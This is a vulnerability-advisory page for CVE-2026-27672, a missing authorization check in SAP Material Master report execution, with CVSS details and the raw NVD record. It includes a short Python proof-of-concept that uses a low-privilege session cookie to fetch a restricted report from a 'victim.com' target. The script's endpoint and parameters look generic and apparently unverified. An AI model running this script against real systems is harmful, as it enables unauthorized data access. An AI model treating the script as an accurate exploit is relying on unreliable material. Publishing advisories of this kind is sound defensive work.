Security Vulnerability Report
中文
CVE-2026-27672 CVSS 4.3 MEDIUM

CVE-2026-27672

Published: 2026-04-14 00:16:05
Last Modified: 2026-04-17 15:18:17

Description

The Material Master application does not enforce authorization checks for authenticated users when executing reports, resulting in the disclosure of sensitive information. This vulnerability has a low impact on confidentiality and does not affect integrity and availability of the system.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP Material Master (具体受影响版本请参考SAP Note 3703276)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_sap_cve(target, session_cookie): """ PoC for CVE-2026-27672 Demonstrates unauthorized access to reports in SAP Material Master. """ url = f"{target}/report_execution" headers = { "Cookie": f"JSESSIONID={session_cookie}", "User-Agent": "PoC-Client/1.0" } # Attempt to access a restricted report params = {"report_id": "sensitive_data_report", "format": "xml"} response = requests.get(url, headers=headers, params=params) if response.status_code == 200: print("[+] Vulnerability confirmed: Data retrieved.") print(response.content) else: print("[-] Request failed or patched.") # Usage: exploit_sap_cve("https://victim.com", "low_priv_session_id")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27672", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:05.297", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Material Master application does not enforce authorization checks for authenticated users when executing reports, resulting in the disclosure of sensitive information. This vulnerability has a low impact on confidentiality and does not affect integrity and availability of the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3703276", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}